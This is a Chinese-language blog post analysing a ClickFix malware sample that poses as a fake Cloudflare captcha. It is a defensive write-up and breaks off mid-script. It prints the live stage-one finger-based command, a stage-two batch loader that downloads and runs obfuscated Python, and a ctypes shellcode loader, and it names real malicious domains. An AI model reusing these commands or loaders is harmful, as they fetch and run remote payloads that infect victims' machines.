<!DOCTYPE html>


<html theme="dark" showBanner="true" hasBanner="true" > 
<link href="/fontawesome/css/fontawesome.css" rel="stylesheet">
<link href="/fontawesome/css/brands.css" rel="stylesheet">
<link href="/fontawesome/css/solid.css" rel="stylesheet">
<script src="/js/color.global.min.js" ></script>
<script src="/js/load-settings.js" ></script>
<head>
  <meta charset="utf-8">
  
  
  

  
  <title>记一次 ClickFix 样本实战分析 | 棱晶の小窝</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <link rel="preload" href="/css/fonts/Roboto-Regular.ttf" as="font" type="font/ttf" crossorigin="anonymous">
  <link rel="preload" href="/css/fonts/Roboto-Bold.ttf" as="font" type="font/ttf" crossorigin="anonymous">

  <meta name="description" content="1. 前言本文记录了一次典型的 ClickFix 样本从最外层模式到内层载荷完整分析的具体流程。ClickFix 是一种利用人类自身认知弱点进行攻击的手段，一般通过网络页面进行传播，伪造成各种验证码验证界面，实际却要求人去执行正常验证码根本不会经历的高危操作，比如打开cmd、powershell等windows本地高权限命令执行程序。ClickFix 网页在按下“我不是机器人”按钮的瞬间将伪造成验">
<meta property="og:type" content="article">
<meta property="og:title" content="记一次 ClickFix 样本实战分析">
<meta property="og:url" content="https://astralprisma.github.io/2026/05/13/rw_ClickFix/index.html">
<meta property="og:site_name" content="棱晶の小窝">
<meta property="og:description" content="1. 前言本文记录了一次典型的 ClickFix 样本从最外层模式到内层载荷完整分析的具体流程。ClickFix 是一种利用人类自身认知弱点进行攻击的手段，一般通过网络页面进行传播，伪造成各种验证码验证界面，实际却要求人去执行正常验证码根本不会经历的高危操作，比如打开cmd、powershell等windows本地高权限命令执行程序。ClickFix 网页在按下“我不是机器人”按钮的瞬间将伪造成验">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://astralprisma.github.io/source/pictures/clickfix.png">
<meta property="article:published_time" content="2026-05-13T14:15:00.000Z">
<meta property="article:modified_time" content="2026-05-13T14:14:47.424Z">
<meta property="article:author" content="Astral Prisma">
<meta property="article:tag" content="Malware">
<meta property="article:tag" content="Virus">
<meta property="article:tag" content="Trojan">
<meta property="article:tag" content="ClickFix">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://astralprisma.github.io/source/pictures/clickfix.png">
  
  
    <link rel="shortcut icon" href="/AP.png">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
  
  
    
<div id="banner" class="">
  <img src="/OTSA.png" itemprop="image">
  <div id="banner-dim"></div>
</div>
 
   
  <div id="main-grid" class="shadow   ">
    <div id="nav" class=""  >
      <navbar id="navbar">
  <nav id="title-nav">
    <a href="/">
      <div id="vivia-logo">
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
        <div class="dot"></div>
      </div>
      <div>棱晶の小窝 </div>
    </a>
  </nav>
  <nav id="main-nav">
    
      <a class="main-nav-link" href="/">Home</a>
    
      <a class="main-nav-link" href="/archives">Archives</a>
    
      <a class="main-nav-link" href="/about">About</a>
    
  </nav>
  <nav id="sub-nav">
    <a id="theme-btn" class="nav-icon">
      <span class="light-mode-icon"><svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M438.5-829.913v-48q0-17.452 11.963-29.476 11.964-12.024 29.326-12.024 17.363 0 29.537 12.024t12.174 29.476v48q0 17.452-11.963 29.476-11.964 12.024-29.326 12.024-17.363 0-29.537-12.024T438.5-829.913Zm0 747.826v-48q0-17.452 11.963-29.476 11.964-12.024 29.326-12.024 17.363 0 29.537 12.024t12.174 29.476v48q0 17.452-11.963 29.476-11.964 12.024-29.326 12.024-17.363 0-29.537-12.024T438.5-82.087ZM877.913-438.5h-48q-17.452 0-29.476-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537t29.476-12.174h48q17.452 0 29.476 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T877.913-438.5Zm-747.826 0h-48q-17.452 0-29.476-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537T82.087-521.5h48q17.452 0 29.476 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T130.087-438.5Zm660.174-290.87-34.239 32q-12.913 12.674-29.565 12.174-16.653-.5-29.327-13.174-12.674-12.673-12.554-28.826.12-16.152 12.794-28.826l33-35q12.913-12.674 30.454-12.674t30.163 12.847q12.709 12.846 12.328 30.826-.38 17.98-13.054 30.653ZM262.63-203.978l-32 34q-12.913 12.674-30.454 12.674t-30.163-12.847q-12.709-12.846-12.328-30.826.38-17.98 13.054-30.653l33.239-31q12.913-12.674 29.565-12.174 16.653.5 29.327 13.174 12.674 12.673 12.554 28.826-.12 16.152-12.794 28.826Zm466.74 33.239-32-33.239q-12.674-12.913-12.174-29.565.5-16.653 13.174-29.327 12.673-12.674 28.826-13.054 16.152-.38 28.826 12.294l35 33q12.674 12.913 12.674 30.454t-12.847 30.163q-12.846 12.709-30.826 12.328-17.98-.38-30.653-13.054ZM203.978-697.37l-34-33q-12.674-12.913-13.174-29.945-.5-17.033 12.174-29.707t31.326-13.293q18.653-.62 31.326 13.054l32 34.239q11.674 12.913 11.174 29.565-.5 16.653-13.174 29.327-12.673 12.674-28.826 12.554-16.152-.12-28.826-12.794ZM480-240q-100 0-170-70t-70-170q0-100 70-170t170-70q100 0 170 70t70 170q0 100-70 170t-170 70Zm-.247-82q65.703 0 111.475-46.272Q637-414.544 637-480.247t-45.525-111.228Q545.95-637 480.247-637t-111.475 45.525Q323-545.95 323-480.247t45.525 111.975Q414.05-322 479.753-322ZM481-481Z"/></svg></span>
      <span class="dark-mode-icon"><svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M480.239-116.413q-152.63 0-258.228-105.478Q116.413-327.37 116.413-480q0-130.935 77.739-227.435t206.304-125.043q43.022-9.631 63.87 10.869t3.478 62.805q-8.891 22.043-14.315 44.463-5.424 22.42-5.424 46.689 0 91.694 64.326 155.879 64.325 64.186 156.218 64.186 24.369 0 46.978-4.946 22.609-4.945 44.413-14.076 42.826-17.369 62.967 1.142 20.142 18.511 10.511 61.054Q807.174-280 712.63-198.206q-94.543 81.793-232.391 81.793Zm0-95q79.783 0 143.337-40.217 63.554-40.218 95.793-108.283-15.608 4.044-31.097 5.326-15.49 1.283-31.859.805-123.706-4.066-210.777-90.539-87.071-86.473-91.614-212.092-.24-16.369.923-31.978 1.164-15.609 5.446-30.978-67.826 32.478-108.282 96.152Q211.652-559.543 211.652-480q0 111.929 78.329 190.258 78.329 78.329 190.258 78.329ZM466.13-465.891Z"/></svg></span>
    </a>
    
    <div id="nav-menu-btn" class="nav-icon">
      <svg xmlns="http://www.w3.org/2000/svg" height="20" viewBox="0 -960 960 960" width="20"><path d="M177.37-252.282q-17.453 0-29.477-11.964-12.024-11.963-12.024-29.326t12.024-29.537q12.024-12.174 29.477-12.174h605.26q17.453 0 29.477 11.964 12.024 11.963 12.024 29.326t-12.024 29.537q-12.024 12.174-29.477 12.174H177.37Zm0-186.218q-17.453 0-29.477-11.963-12.024-11.964-12.024-29.326 0-17.363 12.024-29.537T177.37-521.5h605.26q17.453 0 29.477 11.963 12.024 11.964 12.024 29.326 0 17.363-12.024 29.537T782.63-438.5H177.37Zm0-186.217q-17.453 0-29.477-11.964-12.024-11.963-12.024-29.326t12.024-29.537q12.024-12.174 29.477-12.174h605.26q17.453 0 29.477 11.964 12.024 11.963 12.024 29.326t-12.024 29.537q-12.024 12.174-29.477 12.174H177.37Z"/></svg>
    </div>
  </nav>
</navbar>
<div id="nav-dropdown" class="hidden">
  <div id="dropdown-link-list">
    
      <a class="nav-dropdown-link" href="/">Home</a>
    
      <a class="nav-dropdown-link" href="/archives">Archives</a>
    
      <a class="nav-dropdown-link" href="/about">About</a>
    
     
    </div>
</div>
<script>
  let dropdownBtn = document.getElementById("nav-menu-btn");
  let dropdownEle = document.getElementById("nav-dropdown");
  dropdownBtn.onclick = function() {
    dropdownEle.classList.toggle("hidden");
  }
</script>
    </div>
    <div id="sidebar-wrapper">
      <sidebar id="sidebar">
  
    <div class="widget-wrap">
  <div class="info-card">
    <div class="avatar">
      
        <image src=/XH_2.png></image>
      
      <div class="img-dim"></div>
    </div>
    <div class="info">
      <div class="username">Astral Prisma </div>
      <div class="dot"></div>
      <div class="subtitle">星界棱晶 </div>
      <div class="link-list">
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://space.bilibili.com/454936579" title="Bilibili"><image src=https://www.bilibili.com/favicon.ico></image></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://www.primegrid.com/show_user.php?userid=1243718" title="PrimeGrid"><image src=https://www.primegrid.com/images/favicon_32.png></image></a>
        
          <a class="link-btn" target="_blank" rel="noopener" href="https://github.com/AstralPrisma" title="GitHub"><image src=https://github.githubassets.com/favicons/favicon.png></image></a>
         
      </div>  
    </div>
  </div>
</div>

  
  <div class="sticky">
    
      


  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">分类</h3>
      <div class="category-box">
            <a class="category-link" href="/categories/Ideas/">
                Ideas
                <div class="category-count">3</div>
            </a>
        
            <a class="category-link" href="/categories/WriteUp/">
                WriteUp
                <div class="category-count">41</div>
            </a>
        
            <a class="category-link" href="/categories/RW/">
                RW
                <div class="category-count">1</div>
            </a>
        
            <a class="category-link" href="/categories/%E5%87%BA%E9%A2%98%E8%AE%B0%E5%BD%95/">
                出题记录
                <div class="category-count">1</div>
            </a>
        </div>
    </div>
  </div>


    
      
  <div class="widget-wrap">
    <div class="widget">
      <h3 class="widget-title">标签</h3>
      <ul class="widget-tag-list" itemprop="keywords"><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/got/" rel="tag">.got</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/rel/" rel="tag">.rel</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/ARM/" rel="tag">ARM</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Android/" rel="tag">Android</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Anti-Debug/" rel="tag">Anti-Debug</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/AutoRe/" rel="tag">AutoRe</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Brainfuck/" rel="tag">Brainfuck</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/C/" rel="tag">C#</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/CUDA/" rel="tag">CUDA</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Cheat-Engine/" rel="tag">Cheat Engine</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/ClickFix/" rel="tag">ClickFix</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/DOS/" rel="tag">DOS</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Differential-Cryptanalysis/" rel="tag">Differential Cryptanalysis</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Driver/" rel="tag">Driver</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Exception-Handling/" rel="tag">Exception Handling</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Frida-Hook/" rel="tag">Frida Hook</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Golang/" rel="tag">Golang</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Harmony-OS/" rel="tag">Harmony OS</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/HookAPI/" rel="tag">HookAPI</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/IPC/" rel="tag">IPC</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Indirect-Jump/" rel="tag">Indirect Jump</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Java/" rel="tag">Java</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Kotlin/" rel="tag">Kotlin</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Lua/" rel="tag">Lua</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/MIPS/" rel="tag">MIPS</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Mac/" rel="tag">Mac</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Malware/" rel="tag">Malware</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Obfuscate/" rel="tag">Obfuscate</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Pascal/" rel="tag">Pascal</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Powershell/" rel="tag">Powershell</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Pyarmor/" rel="tag">Pyarmor</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Python/" rel="tag">Python</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/QEMU/" rel="tag">QEMU</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/R2R/" rel="tag">R2R</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Remote/" rel="tag">Remote</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Rust/" rel="tag">Rust</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/SMC/" rel="tag">SMC</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Selfhash/" rel="tag">Selfhash</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Side-Channel/" rel="tag">Side Channel</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/String-Encryption/" rel="tag">String Encryption</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Subprocess/" rel="tag">Subprocess</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Traffic/" rel="tag">Traffic</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Trojan/" rel="tag">Trojan</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Unicorn/" rel="tag">Unicorn</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/VM/" rel="tag">VM</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Virus/" rel="tag">Virus</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/WASM/" rel="tag">WASM</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Wechat-Mini-Program/" rel="tag">Wechat Mini Program</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Windows-DLL/" rel="tag">Windows DLL</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/Yara/" rel="tag">Yara</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/iOS/" rel="tag">iOS</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/il2cpp/" rel="tag">il2cpp</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/linker/" rel="tag">linker</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/pickle/" rel="tag">pickle</a></li><li class="widget-tag-list-item"><a class="widget-tag-list-link" href="/tags/x96/" rel="tag">x96</a></li></ul>
    </div>
  </div>


    
  </div>
</sidebar>
    </div>
    <div id="content-body">
       

<article id="post-rw_ClickFix" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  
    
   
  <div class="article-inner">
    <div class="article-main">
      <header class="article-header">
        
<div class="main-title-bar">
  <div class="main-title-dot"></div>
  
    
      <h1 class="p-name article-title" itemprop="headline name">
        记一次 ClickFix 样本实战分析
      </h1>
    
  
</div>

        <div class='meta-info-bar'>
          <div class="meta-info">
  <time class="dt-published" datetime="2026-05-13T14:15:00.000Z" itemprop="datePublished">2026-05-13</time>
</div>
          <div class="need-seperator meta-info">
            <div class="meta-cate-flex">
  
  <a class="meta-cate-link" href="/categories/RW/">RW</a>
   
</div>
  
          </div>
          <div class="wordcount need-seperator meta-info">
            4.2k 词 
          </div>
        </div>
        
  <ul class="article-tag-list" itemprop="keywords"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/ClickFix/" rel="tag">ClickFix</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Malware/" rel="tag">Malware</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Trojan/" rel="tag">Trojan</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Virus/" rel="tag">Virus</a></li></ul>

      </header>
      <div class="e-content article-entry" itemprop="articleBody">
        
          <h2 id="1-前言"><a href="#1-前言" class="headerlink" title="1. 前言"></a>1. 前言</h2><p>本文记录了一次典型的 ClickFix 样本从最外层模式到内层载荷完整分析的具体流程。ClickFix 是一种利用人类自身认知弱点进行攻击的手段，一般通过网络页面进行传播，伪造成各种验证码验证界面，实际却要求人去执行正常验证码根本不会经历的高危操作，比如打开cmd、powershell等windows本地高权限命令执行程序。ClickFix 网页在按下“我不是机器人”按钮的瞬间将伪造成验证码的恶意载荷下载链接复制到剪贴板，然后要求用户在各种能运行命令的窗口粘贴并执行，下载远程的恶意载荷到本地并运行从而完成感染。</p>
<h2 id="2-样本最外层网页模式"><a href="#2-样本最外层网页模式" class="headerlink" title="2. 样本最外层网页模式"></a>2. 样本最外层网页模式</h2><p>本次遇到的 ClickFix 页面伪造成了Cloudflare的验证码：</p>
<p><img src="/pictures/clickfix.png" title="img"></p>
<p>在按下按钮后，复制到剪贴板的一阶段命令为：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="string">&quot;&quot;</span><span class="string">&quot;%COMSPEC%&quot;</span><span class="string">&quot;&quot;</span> /c s^t^a^r^t <span class="string">&quot;&quot;</span> /min <span class="keyword">for</span> /f <span class="string">&quot;skip=16 delims=&quot;</span> %d <span class="keyword">in</span> (<span class="string">&#x27;f^^i^^n^^g^^e^^r fGOPzWUAOf@homveraahub.com&#x27;</span>) <span class="keyword">do</span> %d &amp; <span class="built_in">echo</span> <span class="string">&#x27;               ---Verify ----------------press ENTER---              &#x27;</span></span><br></pre></td></tr></table></figure>

<p>该命令从<code>finger://homveraahub[.]com:79/fGOPzWUAOf</code>获取载荷，然后进行<code>for /f &quot;skip=16 delims=&quot; %d in (...) do %d</code>，即从第 17 行开始，每一行都赋值给 <code>%d</code>，再用<code>do %d</code>把这一行直接当成 Windows 命令执行。</p>
<h2 id="3-逐层获取恶意载荷"><a href="#3-逐层获取恶意载荷" class="headerlink" title="3. 逐层获取恶意载荷"></a>3. 逐层获取恶意载荷</h2><p>接下来在隔离的Linux虚拟机环境下安全获取第二阶段的载荷：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">mkdir</span> -p sample</span><br><span class="line"><span class="built_in">cd</span> sample</span><br><span class="line"><span class="built_in">printf</span> <span class="string">&#x27;fGOPzWUAOf\r\n&#x27;</span> | nc -w 10 homveraahub.com 79 | <span class="built_in">tee</span> finger_raw.txt</span><br></pre></td></tr></table></figure>

<p>获取到第二阶段的载荷：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">call <span class="built_in">set</span> <span class="string">&quot;XJsKVTebpCGMBTbk=%LocalAppData%\%random%%random%%random%%random%.com&quot;</span></span><br><span class="line">call <span class="built_in">set</span> <span class="string">&quot;pISFKrsALURpggqA=%LocalAppData%\IronPython.3.4.2&quot;</span></span><br><span class="line">call <span class="built_in">set</span> <span class="string">&quot;YgVUIEbvoQTOBRUG=%random%%random%%random%.exe&quot;</span></span><br><span class="line">call mkdir <span class="string">&quot;%pISFKrsALURpggqA%&quot;</span> <span class="number">2</span>&gt;nul</span><br><span class="line">call <span class="built_in">copy</span> /Y <span class="string">&quot;%SystemRoot%\System32\curl.exe&quot;</span> <span class="string">&quot;%XJsKVTebpCGMBTbk%&quot;</span></span><br><span class="line">call taskkill /f /im expl*</span><br><span class="line">call <span class="string">&quot;%XJsKVTebpCGMBTbk%&quot;</span> <span class="literal">-s</span> <span class="literal">-L</span> <span class="literal">--tlsv1</span>.<span class="number">2</span> <span class="literal">--ssl-no-revoke</span> <span class="literal">-o</span> <span class="string">&quot;%pISFKrsALURpggqA%.pdf&quot;</span> github.com/IronLanguages/ironpython3/releases/download/v3.<span class="number">4.2</span>/IronPython.<span class="number">3.4</span>.<span class="number">2</span>.zip</span><br><span class="line">call tar <span class="literal">-xf</span> <span class="string">&quot;%pISFKrsALURpggqA%.pdf&quot;</span> <span class="literal">-C</span> <span class="string">&quot;%pISFKrsALURpggqA%&quot;</span></span><br><span class="line">call rename <span class="string">&quot;%pISFKrsALURpggqA%\net462\ipyw32.exe&quot;</span> <span class="string">&quot;%YgVUIEbvoQTOBRUG%&quot;</span></span><br><span class="line">call <span class="string">&quot;%pISFKrsALURpggqA%\net462\%YgVUIEbvoQTOBRUG%&quot;</span> <span class="literal">-c</span> <span class="string">&quot;import base64,zlib,sys,subprocess as s;s.Popen([sys.executable,&#x27;-c&#x27;,zlib.decompress(base64.b64decode(&#x27;eJydk91KA0EMhb/rPoXghfWiW7dQWwUfQV9Bat3FQv9sd8XHl4EvEErF4kXITE5OcpKdvQaOwAvwDCyADngABsAK2AB7YAccxK/kFVtfkNslvLkgv/e+1kruG1AZLzU+zWvU0Vk36yr5r8Ay8WLGRuzdcyvWy+3EPzx3aj2mmkX3NtX7TjM8ndnTJXp6a34ZOzh/q2/U/JeGgXjW8t+9Vifcnbto7D0Ebn7Z1SMw1rZyV86wS32jT8y0kXNvbviJvgZmwCjFy/3O2NR3vJRbYnPnnYkHt5VXa4sUm6tv6nl88m2OzhPfoXYXtyd7XdhrmLB4ezFz3GOfvXtpk/6oPTjzX1XprTXa3noT8Trx472EhqG+4D96C1rs&#x27;)).decode(&#x27;utf-32&#x27;)])&quot;</span></span><br><span class="line">call <span class="built_in">start</span> explorer.exe</span><br><span class="line">call <span class="keyword">exit</span> /b</span><br></pre></td></tr></table></figure>

<p>可以看到其中下载了python环境并运行了一段python代码，其中base64+zlib压缩+utf32编码的载荷解密后通向下一阶段的载荷地址：<code>https://noidoret[.]com/6d6d2d17-d270-59c6-8b75-df011af08e58/version1</code>。获取第三层载荷：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">mkdir -p sample</span><br><span class="line">cd sample</span><br><span class="line"></span><br><span class="line">DOMAIN=<span class="string">&#x27;noidoret.com&#x27;</span></span><br><span class="line">PATH_=<span class="string">&#x27;/6d6d2d17-d270-59c6-8b75-df011af08e58/version1&#x27;</span></span><br><span class="line"></span><br><span class="line">curl --proto <span class="string">&#x27;=https&#x27;</span> \</span><br><span class="line">  --tlsv1<span class="number">.2</span> \</span><br><span class="line">  --connect-timeout <span class="number">10</span> \</span><br><span class="line">  --<span class="built_in">max</span>-time <span class="number">30</span> \</span><br><span class="line">  --location \</span><br><span class="line">  --fail \</span><br><span class="line">  --silent \</span><br><span class="line">  --show-error \</span><br><span class="line">  -D stage3.headers.txt \</span><br><span class="line">  -o stage3.py.txt \</span><br><span class="line">  <span class="string">&quot;https://$&#123;DOMAIN&#125;$&#123;PATH_&#125;&quot;</span></span><br><span class="line"></span><br><span class="line">sha256sum stage3.py.txt &gt; stage3.sha256.txt</span><br><span class="line">file stage3.py.txt</span><br><span class="line">sed -n <span class="string">&#x27;1,120p&#x27;</span> stage3.py.txt</span><br></pre></td></tr></table></figure>

<p>获取到的载荷为：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="built_in">exec</span>(base64.b64decode(<span class="string">&quot;хW1wе3J0IHRМеWUNCmltcGНydCBjdHlwZXMNCg0KZGVmIHЦvclНkZWNyeXB0KGNМcGЦlcВRleHRfYВl0ZXMsIGtleV...dW5jdHlwZSЦwdHIМDQМmеigМ&quot;</span>.replace(<span class="string">&#x27;М&#x27;</span>, <span class="string">&#x27;p&#x27;</span>).replace(<span class="string">&#x27;х&#x27;</span>, <span class="string">&#x27;a&#x27;</span>).replace(<span class="string">&#x27;Н&#x27;</span>, <span class="string">&#x27;9&#x27;</span>).replace(<span class="string">&#x27;В&#x27;</span>, <span class="string">&#x27;n&#x27;</span>).replace(<span class="string">&#x27;У&#x27;</span>, <span class="string">&#x27;r&#x27;</span>).replace(<span class="string">&#x27;е&#x27;</span>, <span class="string">&#x27;b&#x27;</span>).replace(<span class="string">&#x27;Ц&#x27;</span>, <span class="string">&#x27;h&#x27;</span>)).decode(<span class="string">&#x27;utf-8&#x27;</span>))</span><br></pre></td></tr></table></figure>

<p>可以看到是一个被混淆了的base64，解码后得到：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> ctypes</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">xor_decrypt</span>(<span class="params">ciphertext_bytes, key_bytes</span>):</span><br><span class="line">    decrypted_bytes = <span class="built_in">bytearray</span>()</span><br><span class="line">    key_length = <span class="built_in">len</span>(key_bytes)</span><br><span class="line">    <span class="keyword">for</span> i, byte <span class="keyword">in</span> <span class="built_in">enumerate</span>(ciphertext_bytes):</span><br><span class="line">        decrypted_byte = byte ^ key_bytes[i % key_length]</span><br><span class="line">        decrypted_bytes.append(decrypted_byte)</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">bytes</span>(decrypted_bytes)</span><br><span class="line"></span><br><span class="line">shellcode = <span class="built_in">bytearray</span>(xor_decrypt(base64.b64decode(<span class="string">&#x27;8M9GaNwehC0++qsHypKpa1vLGRcdssG7VRaJtoQtPnQQnKxt7vzhvxlxlFEs0cIWzz08XT4SmXdDF3v8pDSgApQ3pS...WpbZ60sGCEvSXUd3PlwfVvVj7aYg=&#x27;</span>), base64.b64decode(<span class="string">&#x27;pUSq6TDChC0+EpkRypIRA1vLGXGUNw==&#x27;</span>)))</span><br><span class="line">ptr = ctypes.windll.kernel32.HeapAlloc(ctypes.windll.kernel32.HeapCreate(<span class="number">0x00040000</span>, <span class="built_in">len</span>(shellcode), <span class="number">0</span>), <span class="number">0x00000008</span>, <span class="built_in">len</span>(shellcode))</span><br><span class="line">buf = (ctypes.c_char * <span class="built_in">len</span>(shellcode)).from_buffer(shellcode)</span><br><span class="line">time.sleep(<span class="number">3</span>)</span><br><span class="line">ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), buf, ctypes.c_int(<span class="built_in">len</span>(shellcode)))</span><br><span class="line">time.sleep(<span class="number">4</span>)</span><br><span class="line">functype = ctypes.CFUNCTYPE(ctypes.c_void_p)</span><br><span class="line">fn = functype(ptr)</span><br><span class="line">fn()</span><br></pre></td></tr></table></figure>

<p>发现这一层直接存储了一个加密的shellcode，脚本将其解密后直接用Windll执行了这一段shellcode，用脚本解密shellcode：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">from</span> pathlib <span class="keyword">import</span> Path</span><br><span class="line"></span><br><span class="line">src = Path(<span class="string">&quot;stage3 payload.txt&quot;</span>).read_text(encoding=<span class="string">&quot;utf-8&quot;</span>, errors=<span class="string">&quot;replace&quot;</span>)</span><br><span class="line">m = re.search(<span class="string">r&#x27;base64\.b64decode\(&quot;(.*)&quot;\.replace\(&#x27;</span>, src, 